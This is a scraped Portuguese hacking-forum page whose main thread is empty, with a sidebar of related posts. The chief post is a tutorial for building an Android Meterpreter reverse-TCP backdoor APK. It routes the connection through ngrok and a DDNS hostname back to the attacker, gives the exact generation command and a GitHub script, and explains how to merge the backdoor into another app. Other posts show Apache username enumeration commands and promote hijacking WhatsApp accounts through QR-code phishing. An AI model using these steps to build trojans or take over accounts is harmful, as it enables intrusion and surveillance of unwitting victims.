Ir para conteúdo
Entre para seguir isso  
Luíz Henrique

Dicionário Hacker Básico

Recommended Posts

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
Entre para seguir isso  



  • Conteúdo Similar

    • Por hacker-pary
      Bom esse e um link no MEGA com varios PDFs, video-aulas e alguns programas
      nessa apostila  tem muitos material sobre Hacking Sistemas-operacionais e algumas coisinhas sobre as leis do brasil para quem quiser hackea a nasa kkk
      tem algumas outras apostilas de  areas que nao entrao muito na parte de hacking mais isso e so deixar de lado. E tem uma apostila para quem quiser aprender a falar ingles.
       ==>      https://mega.nz/#F!IUAGTAAb!bsOdM6-XG6BBcoKh638REQ!wcoHhSzL 
    • Por DoctorsPeppers
      Um problema recorrente durante minhas invasões foi que por eu morar em uma grande metropole, não tenho um IP fixo, com isso não consigo abrir uma porta de meu roteador apenas para mim, para contornar esse problema resolvi usar o NGROK que abre uma porta no servidor dele trazendo diretamente até meu localhost. O problema parecia ter sido resolvido, até eu notar que a porta criada pelo NGROK mudava constantemente, então resolvi esse problema com uma simples adição de um DDNS que redireciona para o IP e porta do NGROK, o serviço que uso atualmente é o NOIP que vem sendo ótimo para as minhas nessecidades. Mas então eu notei outro problema, criar payloads assim exige um conhecimento e lógica um pouco avançados, então resolvi fazer esse tutorial,  voce tera que ter apenas um computador com kali linux instalado e o programa NGROK, junto claro do metasploit.

      -Para começar entraremos no site do NGROK e baixaremos seu executavel, esperando que voces tenham um conhecimento prévio sobre linux vou pular a instalação.
      -Após instalar iremos executar o comando: "ngrok authtoken <Seu token>". O token pode ser facilmente achado no site do NGROK
      -Depois do ngrok configurado iremos abrir uma porta com o simples comando: "ngrok tcp 8080", assim ele nos fornecera uma url com uma porta qualquer apontando para uma no localhost:8080
      Ficara mais ou menos assim:
                                                                                   
      Session Status                online                                             Account                       Jocelin Flores(Plan: Free)                  Version                       2.2.8                                              Region                        United States (us)                                 Web Interface                 http://127.0.0.1:4040                              Forwarding                    tcp://0.tcp.ngrok.io:13200 -> localhost:8080                                                                                        Connections                   ttl     opn     rt1     rt5     p50     p90                                      0       0       0.00    0.00    0.00    0.00       -Agora criaremos uma conta no https://www.noip.com/
      -Após sua conta estar criada iremos na aba My service e em DNS record.
      -Clique em ADD hostname no canto inferior.
      -defina o hostname que voce quiser.
      -E defina a configuração como Port 80 redirect.
      -agora iremos pegar a url do ngrok e a transformaremos num ip, normalmente é essa: 52.14.61.47. Mas sempre é bom verificar.
      -Defina a porta que esta após a URL em fowarding, isso se encontra na interface do ngrok .
      -Adicione o hostname e deixe o noip aberto.
      -Após isso iremos voltar para o terminal.
      -Voce pode tanto fazer a mão quanto baixar o meu script daqui, mas ensinarei do script.
      -Entre no github e baixe, extraia em alguma pasta o arquivo que esta nomeado como backdoor arquivo: https://github.com/Doctorspeppers/scripts_perl
      -Após isso tente executar o comando:
      perl backdoor -h  
      -Se der erro não se assuste, apenas de um: 
      apt-get install perl -y  
      -Após isso se aparecer as informações e comandos do arquivo esta tudo ok.
      -Usaremos a vertente "perl backdoor -i", pois ela esta definida para ser usada com DDNS.
      -de o comando:
       
      backdoor -i <exploit> <ip/ddns> <port> <ngroklocalport> <apkout>  
      -Legenda:
      <exploit> = Payload que deseja usar. <ip/ddns> = seu ddns que voce definiu no hostname la em cima. <port> = essa sempre sera 80 no no-ip por aquela configuração, mas se usar outro DDNS troque para a que voce escolheu. <ngrocklocalport> = A sua porta que voce definiu no ngrok, aqui no caso a 8080. <apkout> = aonde voce quer despejar o seu backdoor com o nome dele. -Fim da legenda-

      -No meu caso aqui seria assim o comando:
       
      perl backdoor -i android/meterpreter/reverse_tcp  doctorspeppers.ddns.net 80 8080 /root/backdoors/test.apk  
      -Isso claro para um backdoor em um android.
      -tambem é possivel usar o "perl backdoor -i -x" que faz com que voce possa mesclar o backdoor com outro app.
      -note que ao voce colocar o "-x" voce adiciona depois a localidade do app, de resto continua normal.
      Edit1: Toda vez que voce abrir o NGROK para entrar no backdoor, atualize a porta no DDNS e espere 5 minutos
      Edit2: Sim, é possivel utilizar 2 NGROKS em diferentes diretorios instalados para utilizar + de 1 interface do metasploit
      Vou responder as duvidas desse topico por 1 mês e atualizar o script a cada semana, bom aprendizado a todos ^-^
    • Por Rafael Cintra
      E ai pessoal, tudo bem com vocês?
      Hoje venho apresentar a ferramente apache-users.
      Apache-users é um script desenvolvido em Perl que enumera nomes de usuários do Apache que use o modulo UserDir.
      Para baixar essa ferramenta, basta clicar aqui.
      Como usar o apache-users
      [email protected]:~# apache-users USAGE: apache.pl [-h 1.2.3.4] [-l names] [-p 80] [-s (SSL Support 1=true 0=false)] [-e 403 (http code)] [-t threads] Executar contra o host remoto (-h 192.168.0.106) , passando um dicionário de nomes de usuários (-l /usr/share/wordlists/metasploit/unix_users.txt) , a porta a ser usada (-p 80) , desabilitar o SSL (-s 0) , especifique o código de erro HTTP (-e 403) , usando 10 threads (-t 10)
      [email protected]:~# apache-users -h 192.168.0.106 -l /usr/share/wordlists/metasploit/users.txt -p 80 -s 0 -e 403 -t 10 Vocês podem ver que é bem simples de usar essa ferramenta.
      Espero que tenham gostado, qualquer dúvida só deixar nos comentários !
      Até a próxima, obrigado!
      Fiz um repost do meu blog aqui!
      https://rafaelcintralopes.com.br/enumerando-nomes-de-usuarios-do-apache/
    • Por FaceOs
      Como hackear WhatsApp? - Phishing no WhatsApp com QRL_Jacking
       
      Hackear WhatsApp... Um tema, peculiar, não?
      A gente pode pensar em várias estratégias... Backdoor APK, por exemplo, é uma alternativa...
      Mas, e se eu te dissesse que tem como vocêHackear WhatsApp com Phishing, o que você diria?
      - "Ah, Face... Você tá louco... É impossível Hackear WhatsApp dessa forma..."
      Pois é meu querido... Tem como!
       
      Para realizar esse ataque, você precisa utilizar a ferramenta QRL Jacking, que é uma ferramenta própria para aplicação de engenharia social em aplicações com QR code, como forma de login.
      Sabendo disso, a gente pode utilizar essa ferramenta para realizar um ataque no serviço WhatsApp Web e conseguir Hackear Whatsapp.
      Veja como: 
       
       
    • Por Lucciferiansama
      Bem, saudações estou aqui para aproveitar o tempo para ler diversos artigos, sobre as tecnologias que cada vez mais estão mais perceptíveis, a nossa volta.
      Sinto interesse em fazer grupos de estudos, pois atualmente estou sentindo algumas dificuldades para entender algumas matérias que estão sendo propostas, durante as aulas na faculdade e também de quebra conhecer mais sobre o  mundo hacking, e aprofunda no mundo segurança da informação e atuar dentro da área.
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.